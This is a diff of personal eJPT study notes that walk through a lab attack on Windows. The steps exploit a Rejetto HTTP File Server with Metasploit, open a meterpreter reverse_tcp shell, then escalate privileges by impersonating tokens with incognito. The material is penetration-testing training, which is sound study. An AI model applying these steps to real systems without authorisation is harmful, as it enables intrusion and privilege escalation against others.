Miss-ikky/Mywiki/EJPT/Host & Network Penetration Testing/1. System and hostbased attacks/Windows/Windows Vulnerabilities.md

 Demo:

 1. obtain initial access into target system
-	1. Perform nmap scan on target to check webserver on port 80
+	1. Perform `nmap scan` on target to check webserver on port 80
 	2. Visit in the browser and see the rejetto HTTP file server
-2. startup mfsconsole
+2.  mfsconsole
 	1. search for rejetto module and exploit
 	2. set default payload (windows/meterpreter/reverse_tcp)
 	3. set lhost and lport rhost
-3. this will give you a meterpretersession
+3. this will give you a meterpreter session
-	 - run sysinfo
+	 - run `sysinfo`
 	 - migrate our meterpreter session into different process: pgrep explorer and then migrate to this id
-	 - getuid
+	 - `getuid`
 		 - Local service is by default unpriviliged, run: **getprivs** to check priviliges that you have
-		 - The SeImpersonatePrivilige can be used to impersonate other  access tokens![[Pasted image 20230706193427.png]]
+		 - The SeImpersonatePrivilige can be used to impersonate other  access tokens
 		- load incognito
-		- list_tokens -u
+		- `list_tokens -u`
 		- copy the name of the first accesstoken
-		- impersonate_token "paste name token"
+		- `impersonate_token` "paste name token"
 			- getuid
 			- getprivs
 			- pgrep explorer